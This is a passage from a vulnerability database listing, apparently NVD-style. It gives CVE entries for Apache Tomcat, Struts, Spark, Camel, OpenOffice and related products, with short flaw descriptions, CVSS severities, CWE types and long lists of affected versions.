A bug in the error handling of the send file code for the NIO HTTP connector in Apache Tomcat 9.0.0.M1 to 9.0.0.M13, 8.5.0 to 8.5.8, 8.0.0.RC1 to 8.0.39, 7.0.0 to 7.0.73 and 6.0.16 to 6.0.48 resulted in the current Processor object being added to the Processor cache multiple times. This in turn meant that the same Processor could be used for concurrent requests. Sharing a Processor can result in information leakage between requests including, but not limited to, session ID and the response body. The bug was first noticed in 8.5.x onwards, where it appears the refactoring of the Connector code for 8.5.x onwards made it more likely that the bug was observed. Initially it was thought that the 8.5.x refactoring introduced the bug, but further investigation has shown that the bug is present in all currently supported Tomcat versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-388,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 8.5.2
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 8.5.4
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 7.0.38
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 7.0.7
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 8.5.7
apache tomcat 8.0.32
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 7.0.30
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 7.0.12
apache tomcat 8.0.37
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 8.0.23
apache tomcat 8.0.5
apache tomcat 8.5.8
apache tomcat 7.0.17
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 8.0.34
apache tomcat 7.0.25
apache tomcat 8.0.21
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 7.0.46
apache tomcat 8.0
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.66
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 8.0.38
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 8.0.2
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2016-8746 MEDIUM

The Apache Ranger policy engine before 0.6.3 incorrectly matches paths in certain conditions when a policy does not contain wildcards and has the recursion flag set to true.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-426,

Products Affected

Vendor Product Version
apache ranger *
CVE-2016-8747 MEDIUM

An information disclosure issue was discovered in Apache Tomcat 8.5.7 to 8.5.9 and 9.0.0.M11 to 9.0.0.M15 in reverse-proxy configurations. Http11InputBuffer.java allows remote attackers to read data that was intended to be associated with a different request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 8.5.9
apache tomcat 9.0.0
apache tomcat 8.5.7
apache tomcat 8.5.8
CVE-2016-8748 LOW

In Apache NiFi before 1.0.1 and 1.1.x before 1.1.1, there is a cross-site scripting vulnerability in the connection details dialog when accessed by an authorized user. The user-supplied text was not being properly handled when added to the DOM.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache nifi *
apache nifi 1.1.0
CVE-2016-8749 HIGH

Apache Camel's Jackson and JacksonXML unmarshalling operations are vulnerable to Remote Code Execution attacks.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache camel 2.17.1
apache camel 2.16.4
apache camel 2.17.0
apache camel 2.16.0
apache camel 2.17.3
apache camel 2.18.0
apache camel 2.18.1
apache camel 2.16.1
apache camel 2.16.3
apache camel 2.17.2
apache camel 2.17.4
apache camel 2.16.2
CVE-2016-8750 MEDIUM

Apache Karaf prior to 4.0.8 used the LDAPLoginModule to authenticate users to a directory via LDAP. However, it did not encode usernames properly and hence was vulnerable to LDAP injection attacks leading to a denial of service.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-90,

Products Affected

Vendor Product Version
apache karaf *
CVE-2016-8751 LOW

Apache Ranger before 0.6.3 is vulnerable to Stored Cross-Site Scripting when entering custom policy conditions. Admin users can store arbitrary JavaScript code to be executed when normal users log in and access policies.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ranger *
CVE-2016-8752 MEDIUM

Apache Atlas versions 0.6.0 (incubating), 0.7.0 (incubating), and 0.7.1 (incubating) allow access to the webapp directory contents by pointing to URIs like /js and /img.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache atlas 0.7.1
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2016-9774 HIGH

The postinst script in the tomcat6 package before 6.0.45+dfsg-1~deb7u4 on Debian wheezy, before 6.0.35-1ubuntu3.9 on Ubuntu 12.04 LTS and on Ubuntu 14.04 LTS; the tomcat7 package before 7.0.28-4+deb7u8 on Debian wheezy, before 7.0.56-3+deb8u6 on Debian jessie, before 7.0.52-1ubuntu0.8 on Ubuntu 14.04 LTS, and on Ubuntu 12.04 LTS, 16.04 LTS, and 16.10; and the tomcat8 package before 8.0.14-1+deb8u5 on Debian jessie, before 8.0.32-1ubuntu1.3 on Ubuntu 16.04 LTS, before 8.0.37-1ubuntu0.1 on Ubuntu 16.10, and before 8.0.38-2ubuntu1 on Ubuntu 17.04 might allow local users with access to the tomcat account to obtain sensitive information or gain root privileges via a symlink attack on the Catalina localhost directory.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-59,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
canonical ubuntu_linux 16.04
apache tomcat 8.0
canonical ubuntu_linux 14.04
apache tomcat 7.0
canonical ubuntu_linux 16.10
apache tomcat 6.0
debian debian_linux 7.0
debian debian_linux 8.0
CVE-2016-9775 HIGH

The postrm script in the tomcat6 package before 6.0.45+dfsg-1~deb7u3 on Debian wheezy, before 6.0.45+dfsg-1~deb8u1 on Debian jessie, before 6.0.35-1ubuntu3.9 on Ubuntu 12.04 LTS and on Ubuntu 14.04 LTS; the tomcat7 package before 7.0.28-4+deb7u7 on Debian wheezy, before 7.0.56-3+deb8u6 on Debian jessie, before 7.0.52-1ubuntu0.8 on Ubuntu 14.04 LTS, and on Ubuntu 12.04 LTS, 16.04 LTS, and 16.10; and the tomcat8 package before 8.0.14-1+deb8u5 on Debian jessie, before 8.0.32-1ubuntu1.3 on Ubuntu 16.04 LTS, before 8.0.37-1ubuntu0.1 on Ubuntu 16.10, and before 8.0.38-2ubuntu1 on Ubuntu 17.04 might allow local users with access to the tomcat account to gain root privileges via a setgid program in the Catalina directory, as demonstrated by /etc/tomcat8/Catalina/attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
canonical ubuntu_linux 16.04
apache tomcat 8.0
canonical ubuntu_linux 14.04
apache tomcat 7.0
canonical ubuntu_linux 16.10
apache tomcat 6.0
debian debian_linux 7.0
debian debian_linux 8.0
CVE-2017-1000190 MEDIUM

SimpleXML (latest version 2.7.1) is vulnerable to an XXE vulnerability resulting in SSRF, information disclosure, DoS and so on.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
simplexml_project simplexml 2.7.1
simplexml_project simplexml *
apache solr 8.4.1
CVE-2017-12171 MEDIUM

A regression was found in the Red Hat Enterprise Linux 6.9 version of httpd 2.2.15-60, causing comments in the "Allow" and "Deny" configuration lines to be parsed incorrectly. A web administrator could unintentionally allow any client to access a restricted HTTP resource.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,CWE-20,

Products Affected

Vendor Product Version
redhat enterprise_linux 6.9
redhat enterprise_linux_server 6.0
apache http_server 2.2.15-60
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_desktop 6.0
CVE-2017-12174 HIGH

It was found that when Artemis and HornetQ before 2.4.0 are configured with UDP discovery and JGroups discovery a huge byte array is created when receiving an unexpected multicast message. This may result in a heap memory exhaustion, full GC, or OutOfMemoryError.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,

Products Affected

Vendor Product Version
redhat jboss_enterprise_application_platform 6.0.0
apache activemq_artemis *
redhat jboss_enterprise_application_platform 6.4.0
redhat hornetq *
redhat jboss_enterprise_application_platform 7.1.0
CVE-2017-12607 MEDIUM

A vulnerability in OpenOffice's PPT file parser before 4.1.4, and specifically in PPTStyleSheet, allows attackers to craft malicious documents that cause denial of service (memory corruption and application crash) potentially resulting in arbitrary code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
debian debian_linux 7.0
debian debian_linux 8.0
CVE-2017-12608 MEDIUM

A vulnerability in Apache OpenOffice Writer DOC file parser before 4.1.4, and specifically in ImportOldFormatStyles, allows attackers to craft malicious documents that cause denial of service (memory corruption and application crash) potentially resulting in arbitrary code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
debian debian_linux 7.0
debian debian_linux 8.0
CVE-2017-12610 MEDIUM

In Apache Kafka 0.10.0.0 to 0.10.2.1 and 0.11.0.0 to 0.11.0.1, authenticated Kafka clients may use impersonation via a manually crafted protocol message with SASL/PLAIN or SASL/SCRAM authentication when using the built-in PLAIN or SCRAM server implementations in Apache Kafka.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache kafka *
CVE-2017-12611 HIGH

In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.3.24.3
apache struts 2.5.1
apache struts 2.5.3
apache struts 2.1.5
apache struts 2.5.4
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.3.28.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.3.25
apache struts 2.3.33
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.5.10
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.5.2
apache struts 2.3.32
apache struts 2.5.6
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.3.27
apache struts 2.0.14
apache struts 2.3.15.1
apache struts 2.3.23
apache struts 2.3.13
apache struts 2.5.7
apache struts 2.5
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.3.26
apache struts 2.5.8
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.1.1
apache struts 2.3.29
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.5.9
apache struts 2.0.8
apache struts 2.3.24.2
apache struts 2.3.4
apache struts 2.3.30
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.6
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.3.9
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.5.5
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.5
apache struts 2.3.1.2
apache struts 2.2.3
apache struts 2.3.21
apache struts 2.3.20.2
apache struts 2.3.16
CVE-2017-12612 HIGH

In Apache Spark 1.6.0 until 2.1.1, the launcher API performs unsafe deserialization of data received by its socket. This makes applications launched programmatically using the launcher API potentially vulnerable to arbitrary code execution by an attacker with access to any user account on the local machine. It does not affect apps run by spark-submit or spark-shell. The attacker would be able to execute code as the user that ran the Spark application. Users are encouraged to update to version 2.2.0 or later.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache spark 2.0.0
apache spark 1.6.1
apache spark 2.1.1
apache spark 1.6.3
apache spark 2.0.1
apache spark 2.0.2
apache spark 2.1.0
apache spark 1.6.0
apache spark 1.6.2
CVE-2017-12613 LOW

When apr_time_exp*() or apr_os_exp_time*() functions are invoked with an invalid month field value in Apache Portable Runtime APR 1.6.2 and prior, out of bounds memory may be accessed in converting this value to an apr_time_exp_t value, potentially revealing the contents of a different static heap value or resulting in program termination, and may represent an information disclosure or denial of service vulnerability to applications which call these APR functions with unvalidated external input.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H 1.8 5.2

CVSS 2.0

Severity: LOW

Problem Type: CWE-125,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_server_aus 6.4
redhat jboss_core_services 1.0
redhat enterprise_linux_eus 7.6
apache portable_runtime *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server 6.0
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 7.4
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat jboss_core_services -
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
debian debian_linux 9.0
redhat enterprise_linux_eus 7.3
debian debian_linux 7.0
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_server_aus 6.5
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_eus 6.7
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_server_tus 6.6
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_aus 6.6
redhat software_collections 1.0
redhat enterprise_linux_server 7.0
CVE-2017-12614 MEDIUM

An XSS vulnerability was noticed in certain 404 pages that could be exploited to perform an XSS attack. Chrome will detect this as a reflected XSS attempt and prevent the page from loading. Firefox and other browsers don't, and are vulnerable to this attack. Mitigation: The fix for this is to upgrade to Apache Airflow 1.9.0 or above.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2017-12615 MEDIUM

When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-434,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 9.2_ppc64le
apache tomcat 7.0.44
redhat enterprise_linux_server 6.0
redhat enterprise_linux_for_ibm_z_systems_eus 7.6_s390x
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_for_power_little_endian_eus 7.5_ppc64le
redhat enterprise_linux_server_update_services_for_sap_solutions 7.4
apache tomcat 7.0.62
apache tomcat 7.0.33
redhat enterprise_linux_eus_compute_node 7.6
redhat enterprise_linux_eus 7.5
apache tomcat 7.0.3
apache tomcat 7.0.40
redhat enterprise_linux_desktop 6.0
apache tomcat 7.0.72
redhat enterprise_linux_workstation 6.0
apache tomcat 7.0.5
apache tomcat 7.0.71
redhat enterprise_linux_eus_compute_node 7.7
apache tomcat 7.0.0
redhat enterprise_linux_server 7.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.77
apache tomcat 7.0.36
apache tomcat 7.0.57
redhat enterprise_linux_server_tus 7.6
netapp oncommand_balance -
redhat enterprise_linux_for_power_big_endian_eus 7.7_ppc64
apache tomcat 7.0.38
apache tomcat 7.0.64
redhat enterprise_linux_for_power_little_endian_eus 7.4_ppc64le
redhat enterprise_linux_for_power_big_endian_eus 7.5_ppc64
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.67
apache tomcat 7.0.7
netapp 7-mode_transition_tool -
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 7.7_ppc64le
apache tomcat 7.0.34
redhat enterprise_linux_for_power_big_endian 7.0_ppc64
redhat enterprise_linux_server_aus 7.6
apache tomcat 7.0.24
redhat enterprise_linux_for_ibm_z_systems_eus 7.7_s390x
redhat enterprise_linux_for_ibm_z_systems_eus 7.4_s390x
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
redhat enterprise_linux_for_ibm_z_systems_eus 7.5_s390x
apache tomcat 7.0.79
apache tomcat 7.0.8
apache tomcat 7.0.27
redhat enterprise_linux_for_power_big_endian_eus 7.4_ppc64
redhat enterprise_linux_server_aus 7.7
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 7.0.47
redhat enterprise_linux_eus_compute_node 7.5
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 7.0.56
redhat enterprise_linux_server_update_services_for_sap_solutions 7.6
redhat jboss_enterprise_web_server_text-only_advisories -
apache tomcat 7.0.68
apache tomcat 7.0.12
redhat enterprise_linux_server_tus 7.4
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 7.0.28
redhat enterprise_linux_for_power_big_endian_eus 7.6_ppc64
redhat enterprise_linux_for_power_little_endian_eus 7.7_ppc64le
apache tomcat 7.0.21
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 7.4_ppc64le
apache tomcat 7.0.31
apache tomcat 7.0.17
apache tomcat 7.0.59
apache tomcat 7.0.65
redhat enterprise_linux_eus_compute_node 7.4
redhat enterprise_linux_server_tus 7.7
apache tomcat 7.0.11
apache tomcat 7.0.16
redhat jboss_enterprise_web_server 2.0.0
apache tomcat 7.0.75
apache tomcat 7.0.70
redhat enterprise_linux_server_update_services_for_sap_solutions 7.7
redhat enterprise_linux_for_power_little_endian 7.0_ppc64le
apache tomcat 7.0.25
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 7.0.35
redhat enterprise_linux_eus 7.6
apache tomcat 7.0.23
apache tomcat 7.0.19
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_for_scientific_computing 7.0
apache tomcat 7.0.61
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 7.0
redhat enterprise_linux_for_power_little_endian_eus 7.6_ppc64le
redhat enterprise_linux_desktop 7.0
apache tomcat 7.0.58
redhat enterprise_linux_workstation 7.0
apache tomcat 7.0.20
redhat enterprise_linux_eus 7.7
apache tomcat 7.0.14
apache tomcat 7.0.49
netapp oncommand_shift -
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 7.0.26
apache tomcat 7.0.55
apache tomcat 7.0.76
apache tomcat 7.0.2
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 7.6_ppc64le
apache tomcat 7.0.63
redhat enterprise_linux_for_ibm_z_systems 7.0_s390x
apache tomcat 7.0.22
CVE-2017-12616 MEDIUM

When using a VirtualDirContext with Apache Tomcat 7.0.0 to 7.0.80 it was possible to bypass security constraints and/or view the source code of JSPs for resources served by the VirtualDirContext using a specially crafted request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 7.0.80
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 7.0.56
apache tomcat 7.0.44
apache tomcat 7.0.68
apache tomcat 7.0.12
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.17
apache tomcat 7.0.72
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.75
apache tomcat 7.0.0
apache tomcat 7.0.70
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.77
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.61
apache tomcat 7.0.18
apache tomcat 7.0.67
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 7.0.34
apache tomcat 7.0.58
apache tomcat 7.0.24
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.66
apache tomcat 7.0.79
apache tomcat 7.0.26
apache tomcat 7.0.8
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 7.0.76
apache tomcat 7.0.2
apache tomcat 7.0.63
apache tomcat 7.0.22
apache tomcat 7.0.51
apache tomcat 7.0.30
CVE-2017-12617 MEDIUM

When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-434,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.4
canonical ubuntu_linux 18.04
redhat jboss_enterprise_application_platform 6.0.0
apache tomcat 8.0.20
oracle retail_xstore_point_of_service 7.0.6
oracle retail_price_management 12.0
oracle tuxedo_system_and_applications_monitor 12.1.3.0.0
apache tomcat 8.0.14
netapp element -
apache tomcat 7.0.44
redhat enterprise_linux_for_ibm_z_systems_eus 7.6_s390x
apache tomcat 8.0.11
redhat jboss_enterprise_web_server 3.0.0
apache tomcat 8.0.42
apache tomcat 8.5.14
apache tomcat 8.5.2
oracle transportation_management 6.3.3
apache tomcat 8.5.9
oracle retail_point-of-service 14.0.4
apache tomcat 7.0.62
oracle retail_xstore_point_of_service 7.1.6
netapp snapcenter -
redhat enterprise_linux_eus_compute_node 7.6
apache tomcat 8.0.46
oracle retail_store_inventory_management 13.2.9
oracle retail_order_broker 5.1
redhat enterprise_linux_desktop 6.0
canonical ubuntu_linux 16.04
apache tomcat 7.0.5
apache tomcat 7.0.71
redhat enterprise_linux_eus_compute_node 7.7
apache tomcat 8.5.21
apache tomcat 7.0.0
redhat enterprise_linux_server 7.0
redhat enterprise_linux_for_power_little_endian 7.0
apache tomcat 8.5.4
oracle retail_order_management_system 4.0
netapp oncommand_balance -
apache tomcat 8.5.11
oracle instantis_enterprisetrack 17.1
redhat enterprise_linux_for_power_big_endian_eus 7.7_ppc64
apache tomcat 8.0.17
apache tomcat 7.0.64
redhat enterprise_linux_for_power_little_endian_eus 7.4_ppc64le
redhat enterprise_linux_for_power_big_endian_eus 7.5_ppc64
apache tomcat *
oracle retail_xstore_point_of_service 6.0.11
apache tomcat 7.0.43
apache tomcat 8.5.22
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
netapp oncommand_insight -
redhat fuse 1.0
redhat enterprise_linux_for_power_big_endian 7.0_ppc64
apache tomcat 7.0.24
redhat enterprise_linux_for_ibm_z_systems_eus 7.7_s390x
apache tomcat 8.5.7
apache tomcat 8.5.19
apache tomcat 8.0.32
apache tomcat 8.0.44
oracle fmw_platform 12.2.1.3.0
apache tomcat 7.0.1
apache tomcat 7.0.6
redhat enterprise_linux_for_ibm_z_systems_eus 7.5_s390x
debian debian_linux 7.0
apache tomcat 7.0.79
oracle retail_store_inventory_management 14.0.4
apache tomcat 7.0.8
oracle webcenter_sites 11.1.1.8.0
redhat enterprise_linux_server_aus 7.7
apache tomcat 7.0.73
apache tomcat 8.0.19
oracle retail_central_office 14.0.4
apache tomcat 7.0.51
oracle retail_returns_management 2.4.9
apache tomcat 7.0.30
oracle retail_order_broker 5.2
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 7.0.81
oracle retail_eftlink 15.0.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 8.0.25
apache tomcat 8.0.36
oracle management_pack 11.2.1.0.13
redhat jboss_enterprise_web_server_text-only_advisories -
oracle agile_plm 9.3.6
apache tomcat 8.0.45
apache tomcat 7.0.41
oracle retail_order_management_system 4.7
oracle transportation_management 6.3.5
oracle retail_advanced_inventory_planning 14.1
apache tomcat 7.0.31
oracle retail_store_inventory_management 13.1.9
apache tomcat 7.0.17
oracle retail_invoice_matching 14.0
oracle retail_advanced_inventory_planning 15.0
apache tomcat 7.0.59
apache tomcat 7.0.75
oracle retail_invoice_matching 14.1
oracle retail_eftlink 16.0.2
oracle retail_returns_management 14.0.4
oracle retail_invoice_matching 16.0
apache tomcat 7.0.25
apache tomcat 8.5.17
oracle financial_services_analytical_applications_infrastructure *
oracle retail_insights 16.0
apache tomcat 7.0.15
apache tomcat 7.0.48
oracle hospitality_guest_access 4.2.1
apache tomcat 7.0.42
apache tomcat 7.0.74
redhat enterprise_linux_eus 7.6
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 7.0.29
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
oracle retail_back_office 14.1.3
redhat enterprise_linux_desktop 7.0
apache tomcat 7.0.58
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 8.0.24
oracle retail_store_inventory_management 12.0.12
oracle retail_order_broker 16.0
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
oracle retail_store_inventory_management 15.0.2
oracle fmw_platform 12.2.1.2.0
oracle retail_price_management 13.2
oracle micros_retail_xbri_loss_prevention 10.0.1
netapp oncommand_workflow_automation -
oracle retail_store_inventory_management 16.0.1
apache tomcat 7.0.80
oracle retail_price_management 15.0
oracle retail_advanced_inventory_planning 13.4
oracle micros_lucas 2.9.5
netapp active_iq_unified_manager *
oracle micros_retail_xbri_loss_prevention 10.8.0
oracle retail_back_office 14.0.4
oracle retail_price_management 13.0
apache tomcat 8.5.5
apache tomcat 8.0.22
oracle retail_store_inventory_management 14.1.3
oracle workload_manager 12.2.0.1
oracle agile_plm 9.3.3
redhat enterprise_linux_server 6.0
redhat jboss_enterprise_application_platform 6.4.0
oracle hospitality_guest_access 4.2.0
redhat enterprise_linux_for_power_little_endian_eus 7.5_ppc64le
oracle retail_point-of-service 14.1.3
apache tomcat 8.0.35
apache tomcat 7.0.33
oracle retail_price_management 14.0
redhat enterprise_linux_eus 7.5
